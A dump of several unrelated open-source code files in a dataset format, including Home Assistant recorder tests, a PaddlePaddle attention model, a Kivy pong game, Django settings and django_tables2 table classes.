sns2_attr = {**_sns2_attr, "last_reset": zero.isoformat()}
sns3_attr = {**_sns3_attr, "last_reset": zero.isoformat()}
sns4_attr = {**_sns3_attr}
states = {sns1: [], sns2: [], sns3: [], sns4: []}
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=zero):
states[sns1].append(set_state(sns1, "10", attributes=sns1_attr)) # Sum 0
states[sns2].append(set_state(sns2, "110", attributes=sns2_attr)) # Sum 0
states[sns3].append(set_state(sns3, "0", attributes=sns3_attr)) # Sum 0
states[sns4].append(set_state(sns4, "0", attributes=sns4_attr)) # -
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=one):
states[sns1].append(set_state(sns1, "15", attributes=sns1_attr)) # Sum 5
states[sns2].append(set_state(sns2, "120", attributes=sns2_attr)) # Sum 10
states[sns3].append(set_state(sns3, "0", attributes=sns3_attr)) # Sum 0
states[sns4].append(set_state(sns4, "0", attributes=sns4_attr)) # -
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=two):
states[sns1].append(set_state(sns1, "20", attributes=sns1_attr)) # Sum 10
states[sns2].append(set_state(sns2, "130", attributes=sns2_attr)) # Sum 20
states[sns3].append(set_state(sns3, "5", attributes=sns3_attr)) # Sum 5
states[sns4].append(set_state(sns4, "5", attributes=sns4_attr)) # -
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=three):
states[sns1].append(set_state(sns1, "10", attributes=sns1_attr)) # Sum 0
states[sns2].append(set_state(sns2, "0", attributes=sns2_attr)) # Sum -110
states[sns3].append(set_state(sns3, "10", attributes=sns3_attr)) # Sum 10
states[sns4].append(set_state(sns4, "10", attributes=sns4_attr)) # -
sns1_attr = {**_sns1_attr, "last_reset": four.isoformat()}
sns2_attr = {**_sns2_attr, "last_reset": four.isoformat()}
sns3_attr = {**_sns3_attr, "last_reset": four.isoformat()}
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=four):
states[sns1].append(set_state(sns1, "30", attributes=sns1_attr)) # Sum 0
states[sns2].append(set_state(sns2, "30", attributes=sns2_attr)) # Sum -110
states[sns3].append(set_state(sns3, "30", attributes=sns3_attr)) # Sum 10
states[sns4].append(set_state(sns4, "30", attributes=sns4_attr)) # -
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=five):
states[sns1].append(set_state(sns1, "40", attributes=sns1_attr)) # Sum 10
states[sns2].append(set_state(sns2, "45", attributes=sns2_attr)) # Sum -95
states[sns3].append(set_state(sns3, "50", attributes=sns3_attr)) # Sum 30
states[sns4].append(set_state(sns4, "50", attributes=sns4_attr)) # -
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=six):
states[sns1].append(set_state(sns1, "50", attributes=sns1_attr)) # Sum 20
states[sns2].append(set_state(sns2, "55", attributes=sns2_attr)) # Sum -85
states[sns3].append(set_state(sns3, "60", attributes=sns3_attr)) # Sum 40
states[sns4].append(set_state(sns4, "60", attributes=sns4_attr)) # -
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=seven):
states[sns1].append(set_state(sns1, "60", attributes=sns1_attr)) # Sum 30
states[sns2].append(set_state(sns2, "65", attributes=sns2_attr)) # Sum -75
states[sns3].append(set_state(sns3, "80", attributes=sns3_attr)) # Sum 60
states[sns4].append(set_state(sns4, "80", attributes=sns4_attr)) # -
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=eight):
states[sns1].append(set_state(sns1, "70", attributes=sns1_attr)) # Sum 40
states[sns2].append(set_state(sns2, "75", attributes=sns2_attr)) # Sum -65
states[sns3].append(set_state(sns3, "90", attributes=sns3_attr)) # Sum 70
return zero, four, eight, states
def record_states_partially_unavailable(hass):
"""Record some test states.
We inject a bunch of state updates temperature sensors.
"""
mp = "media_player.test"
sns1 = "sensor.test1"
sns2 = "sensor.test2"
sns3 = "sensor.test3"
sns1_attr = {"device_class": "temperature", "state_class": "measurement"}
sns2_attr = {"device_class": "temperature"}
sns3_attr = {}
def set_state(entity_id, state, **kwargs):
"""Set the state."""
hass.states.set(entity_id, state, **kwargs)
wait_recording_done(hass)
return hass.states.get(entity_id)
zero = dt_util.utcnow()
one = zero + timedelta(minutes=1)
two = one + timedelta(minutes=15)
three = two + timedelta(minutes=30)
four = three + timedelta(minutes=15)
states = {mp: [], sns1: [], sns2: [], sns3: []}
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=one):
states[mp].append(
set_state(mp, "idle", attributes={"media_title": str(sentinel.mt1)})
)
states[mp].append(
set_state(mp, "YouTube", attributes={"media_title": str(sentinel.mt2)})
)
states[sns1].append(set_state(sns1, "10", attributes=sns1_attr))
states[sns2].append(set_state(sns2, "10", attributes=sns2_attr))
states[sns3].append(set_state(sns3, "10", attributes=sns3_attr))
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=two):
states[sns1].append(set_state(sns1, "25", attributes=sns1_attr))
states[sns2].append(set_state(sns2, "25", attributes=sns2_attr))
states[sns3].append(set_state(sns3, "25", attributes=sns3_attr))
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=three):
states[sns1].append(set_state(sns1, STATE_UNAVAILABLE, attributes=sns1_attr))
states[sns2].append(set_state(sns2, STATE_UNAVAILABLE, attributes=sns2_attr))
states[sns3].append(set_state(sns3, STATE_UNAVAILABLE, attributes=sns3_attr))
return zero, four, states
| apache-2.0 | -4,513,501,656,360,819,000 | 39.773006 | 88 | 0.582405 | false |
kuke/models | fluid/PaddleNLP/neural_machine_translation/rnn_search/attention_model.py | 1 | 8831 | # Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import paddle.fluid as fluid
from paddle.fluid.contrib.decoder.beam_search_decoder import *
def lstm_step(x_t, hidden_t_prev, cell_t_prev, size):
def linear(inputs):
return fluid.layers.fc(input=inputs, size=size, bias_attr=True)
forget_gate = fluid.layers.sigmoid(x=linear([hidden_t_prev, x_t]))
input_gate = fluid.layers.sigmoid(x=linear([hidden_t_prev, x_t]))
output_gate = fluid.layers.sigmoid(x=linear([hidden_t_prev, x_t]))
cell_tilde = fluid.layers.tanh(x=linear([hidden_t_prev, x_t]))
cell_t = fluid.layers.sums(input=[
fluid.layers.elementwise_mul(
x=forget_gate, y=cell_t_prev), fluid.layers.elementwise_mul(
x=input_gate, y=cell_tilde)
])
hidden_t = fluid.layers.elementwise_mul(
x=output_gate, y=fluid.layers.tanh(x=cell_t))
return hidden_t, cell_t
def seq_to_seq_net(embedding_dim, encoder_size, decoder_size, source_dict_dim,
target_dict_dim, is_generating, beam_size, max_length):
"""Construct a seq2seq network."""
def bi_lstm_encoder(input_seq, gate_size):
# A bi-directional lstm encoder implementation.
# Linear transformation part for input gate, output gate, forget gate
# and cell activation vectors need be done outside of dynamic_lstm.
# So the output size is 4 times of gate_size.
input_forward_proj = fluid.layers.fc(input=input_seq,
size=gate_size * 4,
act='tanh',
bias_attr=False)
forward, _ = fluid.layers.dynamic_lstm(
input=input_forward_proj, size=gate_size * 4, use_peepholes=False)
input_reversed_proj = fluid.layers.fc(input=input_seq,
size=gate_size * 4,
act='tanh',
bias_attr=False)
reversed, _ = fluid.layers.dynamic_lstm(
input=input_reversed_proj,
size=gate_size * 4,
is_reverse=True,
use_peepholes=False)
return forward, reversed
# The encoding process. Encodes the input words into tensors.
src_word_idx = fluid.layers.data(
name='source_sequence', shape=[1], dtype='int64', lod_level=1)
src_embedding = fluid.layers.embedding(
input=src_word_idx,
size=[source_dict_dim, embedding_dim],
dtype='float32')
src_forward, src_reversed = bi_lstm_encoder(
input_seq=src_embedding, gate_size=encoder_size)
encoded_vector = fluid.layers.concat(
input=[src_forward, src_reversed], axis=1)
encoded_proj = fluid.layers.fc(input=encoded_vector,
size=decoder_size,
bias_attr=False)
backward_first = fluid.layers.sequence_pool(
input=src_reversed, pool_type='first')
decoder_boot = fluid.layers.fc(input=backward_first,
size=decoder_size,
bias_attr=False,
act='tanh')
cell_init = fluid.layers.fill_constant_batch_size_like(
input=decoder_boot,
value=0.0,
shape=[-1, decoder_size],
dtype='float32')
cell_init.stop_gradient = False
# Create a RNN state cell by providing the input and hidden states, and
# specifies the hidden state as output.
h = InitState(init=decoder_boot, need_reorder=True)
c = InitState(init=cell_init)
state_cell = StateCell(
inputs={'x': None,
'encoder_vec': None,
'encoder_proj': None},
states={'h': h,
'c': c},
out_state='h')
def simple_attention(encoder_vec, encoder_proj, decoder_state):
# The implementation of simple attention model
decoder_state_proj = fluid.layers.fc(input=decoder_state,
size=decoder_size,
bias_attr=False)
decoder_state_expand = fluid.layers.sequence_expand(
x=decoder_state_proj, y=encoder_proj)
# concated lod should inherit from encoder_proj
mixed_state = encoder_proj + decoder_state_expand
attention_weights = fluid.layers.fc(input=mixed_state,
size=1,
bias_attr=False)
attention_weights = fluid.layers.sequence_softmax(
input=attention_weights)
weigths_reshape = fluid.layers.reshape(x=attention_weights, shape=[-1])
scaled = fluid.layers.elementwise_mul(
x=encoder_vec, y=weigths_reshape, axis=0)
context = fluid.layers.sequence_pool(input=scaled, pool_type='sum')
return context
@state_cell.state_updater
def state_updater(state_cell):
# Define the updater of RNN state cell
current_word = state_cell.get_input('x')
encoder_vec = state_cell.get_input('encoder_vec')
encoder_proj = state_cell.get_input('encoder_proj')
prev_h = state_cell.get_state('h')
prev_c = state_cell.get_state('c')
context = simple_attention(encoder_vec, encoder_proj, prev_h)
decoder_inputs = fluid.layers.concat(
input=[context, current_word], axis=1)
h, c = lstm_step(decoder_inputs, prev_h, prev_c, decoder_size)
state_cell.set_state('h', h)
state_cell.set_state('c', c)
# Define the decoding process
if not is_generating:
# Training process
trg_word_idx = fluid.layers.data(
name='target_sequence', shape=[1], dtype='int64', lod_level=1)
trg_embedding = fluid.layers.embedding(
input=trg_word_idx,
size=[target_dict_dim, embedding_dim],
dtype='float32')
# A decoder for training
decoder = TrainingDecoder(state_cell)
with decoder.block():
current_word = decoder.step_input(trg_embedding)
encoder_vec = decoder.static_input(encoded_vector)
encoder_proj = decoder.static_input(encoded_proj)
decoder.state_cell.compute_state(inputs={
'x': current_word,
'encoder_vec': encoder_vec,
'encoder_proj': encoder_proj
})
h = decoder.state_cell.get_state('h')
decoder.state_cell.update_states()
out = fluid.layers.fc(input=h,
size=target_dict_dim,
bias_attr=True,
act='softmax')
decoder.output(out)
label = fluid.layers.data(
name='label_sequence', shape=[1], dtype='int64', lod_level=1)
cost = fluid.layers.cross_entropy(input=decoder(), label=label)
avg_cost = fluid.layers.mean(x=cost)
feeding_list = ["source_sequence", "target_sequence", "label_sequence"]
return avg_cost, feeding_list
else:
# Inference
init_ids = fluid.layers.data(
name="init_ids", shape=[1], dtype="int64", lod_level=2)
init_scores = fluid.layers.data(
name="init_scores", shape=[1], dtype="float32", lod_level=2)
# A beam search decoder
decoder = BeamSearchDecoder(
state_cell=state_cell,
init_ids=init_ids,
init_scores=init_scores,
target_dict_dim=target_dict_dim,
word_dim=embedding_dim,
input_var_dict={
'encoder_vec': encoded_vector,
'encoder_proj': encoded_proj
},
topk_size=50,
sparse_emb=True,
max_len=max_length,
beam_size=beam_size,
end_id=1,
name=None)
decoder.decode()
translation_ids, translation_scores = decoder()
feeding_list = ["source_sequence"]
return translation_ids, translation_scores, feeding_list
| apache-2.0 | -6,780,336,246,658,529,000 | 39.140909 | 79 | 0.576265 | false |
giruenf/GRIPy | algo/spectral/Hilbert.py | 1 | 2141 | # -*- coding: utf-8 -*-
#
# Class for deal with Analytic Signal
# Universidade Estadual do Norte Fluminense - UENF
# Laboratório de Engenharia de Petróleo - LENEP
# Grupo de Inferência em Reservatório - GIR
# Adriano Paulo Laes de Santana
# September 12th, 2017
#
# The following code is based on
# http://docs.scipy.org/doc/scipy/reference/generated/scipy.signal.hilbert.html
import numpy as np
from scipy.signal import hilbert
class HilbertTransform(object):
def __init__(self, real_signal, sampling):
self._fs = 1 / sampling
self._analytic_signal = hilbert(real_signal)
self._amplitude_envelope = np.abs(self._analytic_signal)
self._instantaneous_phase = np.unwrap(np.angle(self._analytic_signal))
self._instantaneous_frequency = (np.diff(self._instantaneous_phase) /
(2.0 * np.pi) * self._fs)
self._instantaneous_frequency = np.insert(self._instantaneous_frequency, 0, np.nan)
@property
def analytic_signal(self):
return self._analytic_signal
@analytic_signal.setter
def analytic_signal(self, value):
raise Exception('')
@analytic_signal.deleter
def analytic_signal(self):
raise Exception('')
@property
def amplitude_envelope(self):
return self._amplitude_envelope
@amplitude_envelope.setter
def amplitude_envelope(self, value):
raise Exception('')
@amplitude_envelope.deleter
def amplitude_envelope(self):
raise Exception('')
@property
def instantaneous_phase(self):
return self._instantaneous_phase
@instantaneous_phase.setter
def instantaneous_phase(self, value):
raise Exception('')
@instantaneous_phase.deleter
def instantaneous_phase(self):
raise Exception('')
@property
def instantaneous_frequency(self):
return self._instantaneous_frequency
@instantaneous_frequency.setter
def instantaneous_frequency(self, value):
raise Exception('')
@instantaneous_frequency.deleter
def instantaneous_frequency(self):
raise Exception('')
| apache-2.0 | 9,056,039,645,876,526,000 | 27.878378 | 91 | 0.669162 | false |
k-yak/kivy_breakout | pong/main.py | 1 | 3115 | import kivy
kivy.require('1.1.3')
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.properties import NumericProperty, ReferenceListProperty,\
ObjectProperty
from kivy.vector import Vector
from kivy.clock import Clock
from kivy.uix.floatlayout import FloatLayout
class Pong(FloatLayout):
pass
class PongPaddle(Widget):
score = NumericProperty(0)
max = 5
cur = 0
def bounce_ball(self, ball):
if self.collide_widget(ball):
vx, vy = ball.velocity
offset = (ball.center_y - self.center_y) / (self.height / 10)
bounced = Vector(-1 * vx, vy)
if self.max > self.cur:
vel = bounced * 1.1
ball.velocity = vel.x, vel.y + offset
self.cur += 1
else:
ball.velocity = bounced.x, bounced.y + offset
class PongBall(Widget):
velocity_x = NumericProperty(0)
velocity_y = NumericProperty(0)
velocity = ReferenceListProperty(velocity_x, velocity_y)
def move(self):
self.pos = Vector(*self.velocity) + self.pos
class PongGame(Widget):
ball = ObjectProperty(None)
player1 = ObjectProperty(None)
player2 = ObjectProperty(None)
def serve_ball(self, vel=(4, 0)):
self.ball.center = self.center
self.ball.velocity = vel
def update(self, dt):
self.ball.move()
#bounce of paddles
self.player1.bounce_ball(self.ball)
self.player2.bounce_ball(self.ball)
#bounce ball off bottom or top
if (self.ball.y < self.y) or (self.ball.top > self.top):
self.ball.velocity_y *= -1
#went of to a side to score point?
if self.ball.x < self.x:
self.player2.score += 1
self.serve_ball(vel=(4, 0))
if self.ball.x > self.width:
self.player1.score += 1
self.serve_ball(vel=(-4, 0))
def on_touch_move(self, touch):
if touch.x < self.width / 3:
if (touch.y + self.player1.height / 2) > self.height:
self.player1.center_y = self.height - (self.player1.height / 2)
else:
if (touch.y - self.player1.height / 2) < 0:
self.player1.center_y = self.player1.height / 2
else:
self.player1.center_y = touch.y
if touch.x > self.width - self.width / 3:
if (touch.y + self.player2.height / 2) > self.height:
self.player2.center_y = self.height - (self.player2.height / 2)
else:
if (touch.y - self.player2.height / 2) < 0:
self.player2.center_y = self.player2.height / 2
else:
self.player2.center_y = touch.y
class PongApp(App):
def build(self):
game = PongGame()
game.serve_ball()
Clock.schedule_interval(game.update, 1.0 / 60.0)
return game
if __name__ in ('__main__', '__android__'):
PongApp().run() | mit | -4,741,882,946,873,738,000 | 28.262136 | 79 | 0.545746 | false |
AlphaNerd80/Lists | superlists/settings.py | 1 | 2067 | """
Django settings for superlists project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'xmnw6xn$lz)3i1v17lor83lls37&&z-9i@+xasb^f-88h7ew1c'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'lists',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'superlists.urls'
WSGI_APPLICATION = 'superlists.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
| mit | -1,529,950,277,581,714,700 | 23.607143 | 71 | 0.727141 | false |
Moggi/python-playground | queues_thread.py | 1 | 1510 | # From tutorialspoint.com about Python Multithreaded Programming
# https://www.tutorialspoint.com/python/python_multithreading.htm
# !/usr/bin/python
import Queue
import threading
import time
exitFlag = 0
class myThread (threading.Thread):
def __init__(self, threadID, name, q):
threading.Thread.__init__(self)
self.threadID = threadID
self.name = name
self.q = q
def run(self):
print("Starting " + self.name)
process_data(self.name, self.q)
print("Exiting " + self.name)
def process_data(threadName, q):
while not exitFlag:
queueLock.acquire()
if not workQueue.empty():
data = q.get()
queueLock.release()
print("%s processing %s" % (threadName, data))
else:
queueLock.release()
time.sleep(1)
threadList = ["Thread-1", "Thread-2", "Thread-3"]
nameList = ["One", "Two", "Three", "Four", "Five"]
queueLock = threading.Lock()
workQueue = Queue.Queue(10)
threads = []
threadID = 1
# Create new threads
for tName in threadList:
thread = myThread(threadID, tName, workQueue)
thread.start()
threads.append(thread)
threadID += 1
# Fill the queue
queueLock.acquire()
for word in nameList:
workQueue.put(word)
queueLock.release()
# Wait for queue to empty
while not workQueue.empty():
pass
# Notify threads it's time to exit
exitFlag = 1
# Wait for all threads to complete
for t in threads:
t.join()
print("Exiting Main Thread")
| gpl-2.0 | 3,738,729,254,467,271,700 | 21.205882 | 65 | 0.64106 | false |
asoliveira/NumShip | scripts/plot/r-velo-r-zz-plt.py | 1 | 3085 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#É adimensional?
adi = False
#É para salvar as figuras(True|False)?
save = True
#Caso seja para salvar, qual é o formato desejado?
formato = 'jpg'
#Caso seja para salvar, qual é o diretório que devo salvar?
dircg = 'fig-sen'
#Caso seja para salvar, qual é o nome do arquivo?
nome = 'r-velo-r-zz'
#Qual título colocar no gráficos?
titulo = ''#'Curva de ZigZag'
titulo2=''
#Qual a cor dos gráficos?
pc = 'k'
r1c = 'b'
r2c = 'y'
r3c = 'r'
#Estilo de linha
ps = '-'
r1s = '-'
r2s = '-'
r3s = '-'
import os
import scipy as sp
import matplotlib.pyplot as plt
from libplot import *
acelhis = sp.genfromtxt('../entrada/padrao/CurvaZigZag/velo.dat')
acelhis2 = sp.genfromtxt('../entrada/r/saida1.1/CurvaZigZag/velo.dat')
acelhis3 = sp.genfromtxt('../entrada/r/saida1.2/CurvaZigZag/velo.dat')
acelhis4 = sp.genfromtxt('../entrada/r/saida1.3/CurvaZigZag/velo.dat')
lemehis = sp.genfromtxt('../entrada/padrao/CurvaZigZag/leme.dat')
lemehis2 = sp.genfromtxt('../entrada/r/saida1.1/CurvaZigZag/leme.dat')
lemehis3 = sp.genfromtxt('../entrada/r/saida1.2/CurvaZigZag/leme.dat')
lemehis4 = sp.genfromtxt('../entrada/r/saida1.3/CurvaZigZag/leme.dat')
axl = [0, 1000, -0.7, 0.7]
axl2 = [0, 1000, -25, 25]#do leme
#Plotando a Curva de Giro
if adi:
ylabel = r'$t\prime$'
xacellabel = r'$ r\prime$'
else:
ylabel = r'$\dot \psi \quad graus/s$'
xacellabel = r'$t \quad segundos$'
plt.subplot2grid((1,4),(0,0), colspan=3)
#Padrao
plt.plot(acelhis[:, 0], acelhis[:, 6] * (180/sp.pi), color = pc, linestyle = ps,
linewidth = 2, label=ur'padrão')
plt.plot(acelhis2[:, 0], acelhis2[:, 6] * (180/sp.pi), color = r1c,linestyle = r1s,
linewidth = 2, label=ur'1.1--$r$')
plt.plot(acelhis3[:, 0], acelhis3[:, 6] * (180/sp.pi), color = r2c, linestyle = r2s,
linewidth = 2, label=ur'1.2--$r$')
plt.plot(acelhis4[:, 0], acelhis4[:, 6] * (180/sp.pi), color = r3c, linestyle = r3s,
linewidth = 2, label=ur'1.3--$r$')
plt.title(titulo)
plt.legend(bbox_to_anchor=(1.1, 1), loc=2, borderaxespad=0.)
plt.ylabel(ylabel)
plt.xlabel(xacellabel)
plt.axis(axl)
plt.grid(True)
plt.twinx()
plt.plot(lemehis[:, 0], lemehis[:, 1] * (180/sp.pi), color = pc, linestyle = "--",
linewidth = 1, label=ur'leme--padrão')
plt.plot(lemehis2[:, 0], lemehis2[:, 1] * (180/sp.pi), color = r1c, linestyle = "--",
linewidth = 1, label=ur'leme--1.1$r$')
plt.plot(lemehis3[:, 0], lemehis3[:, 1] * (180/sp.pi), color = r2c, linestyle = "--",
linewidth = 1, label=ur'leme--1.2$r$')
plt.plot(lemehis4[:, 0], lemehis4[:, 1] * (180/sp.pi), color = r3c, linestyle = "--",
linewidth = 1, label=ur'leme--1.3$r$')
plt.title(titulo2)
plt.legend(bbox_to_anchor=(1.1, 0), loc=3, borderaxespad=0.)
plt.ylabel(r"$\delta_R$")
plt.axis(axl2)
plt.grid(False)
if save:
if not os.path.exists(dircg):
os.makedirs(dircg)
if os.path.exists(dircg + '/' + nome + '.' + formato):
os.remove(dircg + '/' + nome + '.' + formato)
plt.savefig(dircg + '/' + nome + '.' + formato , format=formato)
else:
plt.show()
| gpl-3.0 | 4,199,525,215,521,507,300 | 30.050505 | 87 | 0.632726 | false |
apdjustino/DRCOG_Urbansim | src/opus_gui/data_manager/run/tools/synthesizer_create_persons_marginals_table.py | 1 | 4218 | # Opus/UrbanSim urban simulation software.
# Copyright (C) 2010-2011 University of California, Berkeley, 2005-2009 University of Washington
# See opus_core/LICENSE
import os, sys
from opus_core.database_management.configurations.database_server_configuration import DatabaseServerConfiguration
from opus_core.database_management.database_server import DatabaseServer
def opusRun(progressCB,logCB,params):
param_dict = {}
for key, val in params.iteritems():
param_dict[str(key)] = str(val)
# get parameter values
database_name = param_dict['database_name']
database_server_connection = param_dict['database_server_connection']
raw_sf3_data_table_name = 'raw_sf3_data'
dbs_config = DatabaseServerConfiguration(database_configuration=database_server_connection)
server = DatabaseServer(database_server_configuration = dbs_config)
opus_db = server.get_database(database_name=database_name)
logCB(" *** WARNING *** \n")
logCB(" *** At the end of this tool, you will need\n")
logCB(" *** to check to make sure each record in the 'person_marginals'\n")
logCB(" *** table has a proper 'pumano' assigned to it. You may need to \n")
logCB(" *** manually update the 'pumano' for each \n")
logCB(" *** block group that this set of queries was \n")
logCB(" *** unable to match up properly due to idiosyncrasies\n")
logCB(" *** in the way that block group ids are recorded\n")
logCB(" *** in the original source files.\n")
opus_db.execute("""
drop table if exists person_marginals;
""")
progressCB(50)
logCB("Creating person_marginals table...\n")
opus_db.execute("""
CREATE TABLE person_marginals
SELECT
mid(GEO_ID, 8, 5) as county,
0 as pumano,
cast(mid(GEO_ID, 13, 6) as unsigned) as tract,
cast(right(GEO_ID, 1) as unsigned) as bg,
P008002 as gender1,
P008041 as gender2,
P008003+P008004+P008005+P008006+P008007+P008042+P008043+P008044+P008045+P008046 as age1,
P008008+P008009+P008010+P008011+P008012+P008013+P008014+P008015+P008016+P008017+P008047+P008048+P008049+P008050+P008051+P008052+P008053+P008054+P008055+P008056 as age2,
P008018+P008019+P008020+P008021+P008022+P008023+P008024+P008025+P008057+P008058+P008059+P008060+P008061+P008062+P008063+P008064 as age3,
P008026+P008027+P008065+P008066 as age4,
P008028+P008029+P008067+P008068 as age5,
P008030+P008031+P008069+P008070 as age6,
P008032+P008033+P008034+P008071+P008072+P008073 as age7,
P008035+P008036+P008037+P008074+P008075+P008076 as age8,
P008038+P008039+P008077+P008078 as age9,
P008040+P008079 as age10,
P006002 as race1,
P006003 as race2,
P006004 as race3,
P006005 as race4,
P006006 as race5,
P006007 as race6,
P006008 as race7,
P008003+P008004+P008005+P008006+P008007+P008008+P008009+P008010+P008011+P008012+P008013+P008014+P008015+P008016+P008017+P008018+P008042+P008043+P008044+P008045+P008046+P008047+P008048+P008049+P008050+P008051+P008052+P008053+P008054+P008055+P008056+P008057 as employment1,
P043004+P043006+P043011+P043013 as employment2,
P043007+P043014 as employment3,
P043008+P043015 as employment4
from raw_sf3_data;
""")
logCB("Updating PUMA identifier...\n")
opus_db.execute("""
UPDATE person_marginals h, pums_id_to_bg_id p
SET h.pumano = p.puma5
WHERE h.county = p.county AND h.tract = p.tract AND h.bg = p.bg;
""")
progressCB(90)
logCB("Closing database connection...\n")
opus_db.close()
logCB('Finished running queries.\n')
progressCB(100)
def opusHelp():
help = 'This tool will create the person marginals table necessary to\n' \
'run the synthesizer algorithm.\n' \
'\n' \
'PREREQUISITE TO RUNNING THIS TOOL:\n' \
' - run the import_sf3_raw_data_to_db tool\n' \
' - run the import_pums_id_to_bg_id_to_db tool\n' \
'\n'
return help | agpl-3.0 | -6,381,364,979,689,039,000 | 44.365591 | 281 | 0.661214 | false |
luckydonald/shairport-decoder | examples/image-average.py | 1 | 1351 | # -*- coding: utf-8 -*-
__author__ = 'luckydonald'
from luckydonaldUtils.logger import logging # pip install luckydonald-utils
logger = logging.getLogger(__name__)
from PIL import Image
import sys
from luckydonaldUtils.images.color import most_frequent_color
def average_colour(image):
colour_tuple = [None, None, None]
for channel in range(3):
# Get data for one channel at a time
pixels = image.getdata(band=channel)
values = []
for pixel in pixels:
values.append(pixel)
colour_tuple[channel] = sum(values) / len(values)
return tuple(colour_tuple)
def save(name, integer, image=None, color=None):
"""
DEBUG FUNCTION
WITH CAPSLOCK DESCRIPTION
:param name:
:param integer:
:param image:
:param color:
:return:
"""
if image:
image.save(name.replace(".png", "export-{}.png".format(integer)))
if color:
sample = Image.new("RGB", (200, 200,), color)
sample.save(name.replace(".png", "export-{}.png".format(integer)))
picture = "Bildschirmfoto 2015-09-15 um 17.37.49"
path = "/Users/luckydonald/Desktop/{}.png".format(picture)
def main():
image = Image.open(path)
max_colors = 10
#if "mode" in sys.argv:
results = most_frequent_color(image, colors=max_colors)
#result2 = average_colour(image)
for i in range(0, max_colors):
save(path, i+1, color=results[i][1])
if __name__ == "__main__":
main()
| lgpl-3.0 | 7,137,069,983,716,982,000 | 21.147541 | 76 | 0.684678 | false |
hkarl/svpb | arbeitsplan/tables.py | 1 | 41071 | # -*- coding: utf-8 -*-
"""
Collect all the tables and column types relevant for django_tables2 here.
"""
import unicodedata
import django_tables2
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.utils.html import escape, format_html
from django.utils.safestring import mark_safe
from django_tables2.utils import A # alias for Accessor
import models
####################################
# Colum Types
####################################
class RadioButtonTable (django_tables2.Table):
def render_radio(self, fieldname, choices, buttontexts, **kwargs):
if 'bound_row' in kwargs:
record = kwargs['bound_row']._record
if 'record' in kwargs:
record = kwargs['record']
try:
tmp = '\n'.join([
format_html(u"""
<label class="btn {4} {5}">
<input type="radio" name="{0}_{1}" value="{2}"> {3}
</label>
""",
fieldname,
record['id'],
choice[0],
choice[1],
buttontexts[choice[0]],
" active" if record[fieldname] == choice[0] else "",
)
for (counter, choice) in enumerate(choices)])
except TypeError:
tmp = '\n'.join([
format_html(u"""
<label class="btn {4} {5}">
<input type="radio" name="{0}_{1}" value="{2}"> {3}
</label>
""",
fieldname,
record.id,
choice[0],
choice[1],
buttontexts[choice[0]],
" active" if getattr(record,fieldname) == choice[0] else "",
)
for (counter, choice) in enumerate(choices)])
return mark_safe(u"""<div class="btn-group-vertical" data-toggle="buttons">""" +
tmp +
u"""</div>""")
class KontaktColumn(django_tables2.columns.Column):
"""Pass an accessor to a user object,
this will be rendered with first and last name
as well as clickable email link.
"""
def __init__(self, *args, **kwargs):
if (('order_by' not in kwargs) and
('accessor' in kwargs)):
kwargs['order_by'] = (kwargs['accessor']+'.last_name',
kwargs['accessor']+'.first_name',
)
## print kwargs['order_by'], type(kwargs['order_by'])
## print kwargs['accessor'], type(kwargs['accessor'])
super(KontaktColumn, self).__init__(*args, **kwargs)
def render(self, value):
# print value
return mark_safe(u'{1} {2}{0}'.format(
(u' <a href="mailto:{0}">'
u'<span class="glyphicon glyphicon-envelope">'
u'</span></a>'.format(value.email)
if value.email
else ""),
value.first_name,
value.last_name,
))
class DeleteIconColumn(django_tables2.columns.Column):
"""Show a delete icon for a particular entry
"""
urlBase = "/"
def __init__(self, *args, **kwargs):
if "urlBase" in kwargs:
self.urlBase = kwargs.pop("urlBase")
